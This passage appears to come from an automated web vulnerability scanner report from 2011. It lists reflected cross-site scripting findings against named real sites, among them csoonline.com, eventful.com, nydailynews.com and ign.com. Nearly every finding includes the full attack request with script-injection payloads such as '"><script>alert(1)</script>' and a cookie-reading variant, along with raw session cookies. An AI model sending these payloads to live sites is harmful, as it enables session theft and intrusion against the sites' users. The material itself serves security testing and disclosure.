GET /images/global/logo-techwords.gif409e8"%3b37e874acee2 HTTP/1.1 Host: comments.csoonline.com Proxy-Connection: keep-alive Referer: http://comments.csoonline.com/febf8%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E3a3399f1586/CIO.com/style.css Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=209317120.1298897096.1.1.utmcsr=ncircle.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; __utma=209317120.1042616613.1298897096.1298897096.1298897096.1; __switchTo5x=4; __unam=db592fa-12e6c4e2ed5-37f53805-1; PHPSESSID=f27pf1mtv6mhneqphta2v7dv47
Response
HTTP/1.0 404 Not Found Date: Mon, 28 Feb 2011 13:19:32 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.11 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Mon, 28 Feb 2011 13:19:32 GMT Cache-Control: no-store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 33622
3.37. http://comments.csoonline.com/images/global/logo-techwords.gif [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://comments.csoonline.com
Path:
/images/global/logo-techwords.gif
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 281dc"-alert(1)-"b424eb1a844 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /images/global/logo-techwords.gif?281dc"-alert(1)-"b424eb1a844=1 HTTP/1.1 Host: comments.csoonline.com Proxy-Connection: keep-alive Referer: http://comments.csoonline.com/febf8%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E3a3399f1586/CIO.com/style.css Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=209317120.1298897096.1.1.utmcsr=ncircle.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; __utma=209317120.1042616613.1298897096.1298897096.1298897096.1; __switchTo5x=4; __unam=db592fa-12e6c4e2ed5-37f53805-1; PHPSESSID=f27pf1mtv6mhneqphta2v7dv47
Response
HTTP/1.0 404 Not Found Date: Mon, 28 Feb 2011 13:19:18 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.11 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Mon, 28 Feb 2011 13:19:18 GMT Cache-Control: no-store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 33661
3.38. http://comments.csoonline.com/images/global/logo-techwords.gif [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://comments.csoonline.com
Path:
/images/global/logo-techwords.gif
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 87c72"><script>alert(1)</script>8b8d6891bc was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /images/global/logo-techwords.gif?87c72"><script>alert(1)</script>8b8d6891bc=1 HTTP/1.1 Host: comments.csoonline.com Proxy-Connection: keep-alive Referer: http://comments.csoonline.com/febf8%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E3a3399f1586/CIO.com/style.css Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=209317120.1298897096.1.1.utmcsr=ncircle.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; __utma=209317120.1042616613.1298897096.1298897096.1298897096.1; __switchTo5x=4; __unam=db592fa-12e6c4e2ed5-37f53805-1; PHPSESSID=f27pf1mtv6mhneqphta2v7dv47
Response
HTTP/1.0 404 Not Found Date: Mon, 28 Feb 2011 13:19:14 GMT Server: Apache/2.2.3 (CentOS) X-Powered-By: PHP/5.2.13 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Mon, 28 Feb 2011 13:19:15 GMT Cache-Control: no-store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 33703
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7bb24"%3b29e03e834a6 was submitted in the REST URL parameter 1. This input was echoed as 7bb24";29e03e834a6 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /themes7bb24"%3b29e03e834a6/CIO.com/style.css HTTP/1.1 Host: comments.csoonline.com Proxy-Connection: keep-alive Referer: http://www.csoonline.com/article/486324/security-tools-templates-policies Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=209317120.1298897096.1.1.utmcsr=ncircle.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_pers=%20s_pv%3DArticle%253A486324%253ASecurity%2520Tools%252C%2520Templates%252C%2520Policies%7C1298898971263%3B; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_ppv%3D0%3B%20s_sq%3D%3B; __utma=209317120.1042616613.1298897096.1298897096.1298897096.1; __utmc=209317120; __utmb=209317120.2.10.1298897096; __switchTo5x=4; __unam=db592fa-12e6c4e2ed5-37f53805-1
Response
HTTP/1.0 404 Not Found Date: Mon, 28 Feb 2011 12:46:30 GMT Server: Apache/2.2.3 (CentOS) X-Powered-By: PHP/5.2.13 Set-Cookie: PHPSESSID=j29dat3qqh0a37c7bgk2pnct04; expires=Wed, 23-Mar-2011 16:19:50 GMT; path=/; domain=.comments.csoonline.com Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Mon, 28 Feb 2011 12:46:30 GMT Cache-Control: no-store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 33598
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload febf8"><script>alert(1)</script>3a3399f1586 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /febf8"><script>alert(1)</script>3a3399f1586/CIO.com/style.css HTTP/1.1 Host: comments.csoonline.com Proxy-Connection: keep-alive Referer: http://www.csoonline.com/article/486324/security-tools-templates-policies Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=209317120.1298897096.1.1.utmcsr=ncircle.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_pers=%20s_pv%3DArticle%253A486324%253ASecurity%2520Tools%252C%2520Templates%252C%2520Policies%7C1298898971263%3B; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_ppv%3D0%3B%20s_sq%3D%3B; __utma=209317120.1042616613.1298897096.1298897096.1298897096.1; __utmc=209317120; __utmb=209317120.2.10.1298897096; __switchTo5x=4; __unam=db592fa-12e6c4e2ed5-37f53805-1
Response
HTTP/1.0 404 Not Found Date: Mon, 28 Feb 2011 12:46:30 GMT Server: Apache/2.2.3 (CentOS) X-Powered-By: PHP/5.2.13 Set-Cookie: PHPSESSID=g6huf2ji8k7ivgb0834tshe013; expires=Wed, 23-Mar-2011 16:19:50 GMT; path=/; domain=.comments.csoonline.com Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Mon, 28 Feb 2011 12:46:30 GMT Cache-Control: no-store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 33655
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3c28c"><script>alert(1)</script>b30dc3701d2 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themes/3c28c"><script>alert(1)</script>b30dc3701d2/style.css HTTP/1.1 Host: comments.csoonline.com Proxy-Connection: keep-alive Referer: http://www.csoonline.com/article/486324/security-tools-templates-policies Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=209317120.1298897096.1.1.utmcsr=ncircle.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_pers=%20s_pv%3DArticle%253A486324%253ASecurity%2520Tools%252C%2520Templates%252C%2520Policies%7C1298898971263%3B; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_ppv%3D0%3B%20s_sq%3D%3B; __utma=209317120.1042616613.1298897096.1298897096.1298897096.1; __utmc=209317120; __utmb=209317120.2.10.1298897096; __switchTo5x=4; __unam=db592fa-12e6c4e2ed5-37f53805-1
Response
HTTP/1.0 404 Not Found Date: Mon, 28 Feb 2011 12:46:34 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.11 Set-Cookie: PHPSESSID=ss2e62743nmu5oe70go89phh82; expires=Wed, 23-Mar-2011 16:19:54 GMT; path=/; domain=.comments.csoonline.com Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Mon, 28 Feb 2011 12:46:34 GMT Cache-Control: no-store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 33652
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 996fb"%3bef92d3fd080 was submitted in the REST URL parameter 2. This input was echoed as 996fb";ef92d3fd080 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /themes/CIO.com996fb"%3bef92d3fd080/style.css HTTP/1.1 Host: comments.csoonline.com Proxy-Connection: keep-alive Referer: http://www.csoonline.com/article/486324/security-tools-templates-policies Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=209317120.1298897096.1.1.utmcsr=ncircle.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_pers=%20s_pv%3DArticle%253A486324%253ASecurity%2520Tools%252C%2520Templates%252C%2520Policies%7C1298898971263%3B; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_ppv%3D0%3B%20s_sq%3D%3B; __utma=209317120.1042616613.1298897096.1298897096.1298897096.1; __utmc=209317120; __utmb=209317120.2.10.1298897096; __switchTo5x=4; __unam=db592fa-12e6c4e2ed5-37f53805-1
Response
HTTP/1.0 404 Not Found Date: Mon, 28 Feb 2011 12:46:34 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.11 Set-Cookie: PHPSESSID=410qc8ja48h0rcgs3deift28r4; expires=Wed, 23-Mar-2011 16:19:54 GMT; path=/; domain=.comments.csoonline.com Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Mon, 28 Feb 2011 12:46:34 GMT Cache-Control: no-store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 33598
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9c28b"%3b393cac47464 was submitted in the REST URL parameter 3. This input was echoed as 9c28b";393cac47464 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /themes/CIO.com/style.css9c28b"%3b393cac47464 HTTP/1.1 Host: comments.csoonline.com Proxy-Connection: keep-alive Referer: http://www.csoonline.com/article/486324/security-tools-templates-policies Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=209317120.1298897096.1.1.utmcsr=ncircle.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_pers=%20s_pv%3DArticle%253A486324%253ASecurity%2520Tools%252C%2520Templates%252C%2520Policies%7C1298898971263%3B; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_ppv%3D0%3B%20s_sq%3D%3B; __utma=209317120.1042616613.1298897096.1298897096.1298897096.1; __utmc=209317120; __utmb=209317120.2.10.1298897096; __switchTo5x=4; __unam=db592fa-12e6c4e2ed5-37f53805-1
Response
HTTP/1.0 404 Not Found Date: Mon, 28 Feb 2011 12:46:38 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.11 Set-Cookie: PHPSESSID=jn2shqrq5dp3hcs074rj336d65; expires=Wed, 23-Mar-2011 16:19:58 GMT; path=/; domain=.comments.csoonline.com Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Mon, 28 Feb 2011 12:46:38 GMT Cache-Control: no-store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 33598
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 26648"><script>alert(1)</script>e48a697392 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themes/CIO.com/26648"><script>alert(1)</script>e48a697392 HTTP/1.1 Host: comments.csoonline.com Proxy-Connection: keep-alive Referer: http://www.csoonline.com/article/486324/security-tools-templates-policies Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=209317120.1298897096.1.1.utmcsr=ncircle.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_pers=%20s_pv%3DArticle%253A486324%253ASecurity%2520Tools%252C%2520Templates%252C%2520Policies%7C1298898971263%3B; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_ppv%3D0%3B%20s_sq%3D%3B; __utma=209317120.1042616613.1298897096.1298897096.1298897096.1; __utmc=209317120; __utmb=209317120.2.10.1298897096; __switchTo5x=4; __unam=db592fa-12e6c4e2ed5-37f53805-1
Response
HTTP/1.0 404 Not Found Date: Mon, 28 Feb 2011 12:46:38 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.11 Set-Cookie: PHPSESSID=rjtg2gnus8bkklt251m06jrc34; expires=Wed, 23-Mar-2011 16:19:58 GMT; path=/; domain=.comments.csoonline.com Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Mon, 28 Feb 2011 12:46:38 GMT Cache-Control: no-store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 33643
3.45. http://comments.csoonline.com/themes/CIO.com/style.css [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://comments.csoonline.com
Path:
/themes/CIO.com/style.css
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1ee95"><script>alert(1)</script>d863f30b9b8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themes/CIO.com/style.css?1ee95"><script>alert(1)</script>d863f30b9b8=1 HTTP/1.1 Host: comments.csoonline.com Proxy-Connection: keep-alive Referer: http://www.csoonline.com/article/486324/security-tools-templates-policies Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=209317120.1298897096.1.1.utmcsr=ncircle.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_pers=%20s_pv%3DArticle%253A486324%253ASecurity%2520Tools%252C%2520Templates%252C%2520Policies%7C1298898971263%3B; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_ppv%3D0%3B%20s_sq%3D%3B; __utma=209317120.1042616613.1298897096.1298897096.1298897096.1; __utmc=209317120; __utmb=209317120.2.10.1298897096; __switchTo5x=4; __unam=db592fa-12e6c4e2ed5-37f53805-1
Response
HTTP/1.0 404 Not Found Date: Mon, 28 Feb 2011 12:46:27 GMT Server: Apache/2.2.3 (CentOS) X-Powered-By: PHP/5.2.13 Set-Cookie: PHPSESSID=749cmu62m5348idf3potrjq6e0; expires=Wed, 23-Mar-2011 16:19:47 GMT; path=/; domain=.comments.csoonline.com Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Mon, 28 Feb 2011 12:46:27 GMT Cache-Control: no-store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 33682
3.46. http://comments.csoonline.com/themes/CIO.com/style.css [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://comments.csoonline.com
Path:
/themes/CIO.com/style.css
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d4700"-alert(1)-"0f7baf53781 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themes/CIO.com/style.css?d4700"-alert(1)-"0f7baf53781=1 HTTP/1.1 Host: comments.csoonline.com Proxy-Connection: keep-alive Referer: http://www.csoonline.com/article/486324/security-tools-templates-policies Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=209317120.1298897096.1.1.utmcsr=ncircle.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_pers=%20s_pv%3DArticle%253A486324%253ASecurity%2520Tools%252C%2520Templates%252C%2520Policies%7C1298898971263%3B; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_ppv%3D0%3B%20s_sq%3D%3B; __utma=209317120.1042616613.1298897096.1298897096.1298897096.1; __utmc=209317120; __utmb=209317120.2.10.1298897096; __switchTo5x=4; __unam=db592fa-12e6c4e2ed5-37f53805-1
Response
HTTP/1.0 404 Not Found Date: Mon, 28 Feb 2011 12:46:28 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.11 Set-Cookie: PHPSESSID=lcg22pp2fnudj2pm8has9cgvk5; expires=Wed, 23-Mar-2011 16:19:48 GMT; path=/; domain=.comments.csoonline.com Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Mon, 28 Feb 2011 12:46:28 GMT Cache-Control: no-store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 33637
3.47. http://eventful.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://eventful.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bbbef"><script>alert(1)</script>08098e07bd6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?bbbef"><script>alert(1)</script>08098e07bd6=1 HTTP/1.1 Host: eventful.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/2000/REC-xhtml1-20000126/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" la ...[SNIP]... <input type="hidden" name="goto" value="http://eventful.com/?bbbef"><script>alert(1)</script>08098e07bd6=1" /> ...[SNIP]...
3.48. http://events.nydailynews.com/venues [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://events.nydailynews.com
Path:
/venues
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4fc80"><script>alert(1)</script>2604110760d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /venues?4fc80"><script>alert(1)</script>2604110760d=1 HTTP/1.1 Host: events.nydailynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en"> <head> <meta http-equiv ...[SNIP]... <meta property="og:url" content="http://www.zvents.com/venues?4fc80"><script>alert(1)</script>2604110760d=1" /> ...[SNIP]...
3.49. http://faqs.ign.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://faqs.ign.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f28c9"><script>alert(1)</script>8c6b30f1fbf was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?f28c9"><script>alert(1)</script>8c6b30f1fbf=1 HTTP/1.1 Host: faqs.ign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!-- stitial !--> <!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" SYSTEM "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"/> <html xmlns="http://www.w3.org/1999/xhtml"> <head> < ...[SNIP]... <a href="http://faqs.ign.com/?f28c9"><script>alert(1)</script>8c6b30f1fbf=1" class="prestitialText2"> ...[SNIP]...
3.50. http://faqs.ign.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://faqs.ign.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1d99e"-alert(1)-"5a4590f2531 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?1d99e"-alert(1)-"5a4590f2531=1 HTTP/1.1 Host: faqs.ign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d0aa8'-alert(1)-'9ed9ec26e4c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /nydailynews/marketsd0aa8'-alert(1)-'9ed9ec26e4c HTTP/1.1 Host: finance.nydailynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Mon, 28 Feb 2011 13:32:26 GMT Server: nginx/0.8.15 Content-Type: text/html; charset=UTF-8 P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Last-Modified: Mon, 28 Feb 2011 13:32:26 GMT X-Cache: MISS from squid1.sv1.financialcontent.com X-Cache-Lookup: MISS from squid1.sv1.financialcontent.com:3128 Via: 1.0 squid1.sv1.financialcontent.com (squid/3.0.STABLE16) Vary: Accept-Encoding Connection: close Content-Length: 16536
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/ ...[SNIP]... script=document.createElement('script'); script.type="text/javascript"; script.src='http://tracker.financialcontent.com/track.js?Source=http%3A%2F%2Ffinance.nydailynews.com%2Fnydailynews%2Fmarketsd0aa8'-alert(1)-'9ed9ec26e4c%3FHTTP_HOST%3Dfinance.nydailynews.com%26HTTPS%3Doff&Type=page&Client=nydailynews&rand=' + Math.random(); head.appendChild(script); </script> ...[SNIP]...
3.52. http://finance.nydailynews.com/nydailynews/markets [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://finance.nydailynews.com
Path:
/nydailynews/markets
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f4164'-alert(1)-'4231e0dc656 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /nydailynews/markets?f4164'-alert(1)-'4231e0dc656=1 HTTP/1.1 Host: finance.nydailynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Mon, 28 Feb 2011 13:32:17 GMT Server: nginx/0.8.15 Content-Type: text/html; charset=UTF-8 P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Last-Modified: Mon, 28 Feb 2011 13:32:17 GMT X-Cache: MISS from squid1.sv1.financialcontent.com X-Cache-Lookup: MISS from squid1.sv1.financialcontent.com:3128 Via: 1.0 squid1.sv1.financialcontent.com (squid/3.0.STABLE16) Vary: Accept-Encoding Connection: close Content-Length: 41119
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
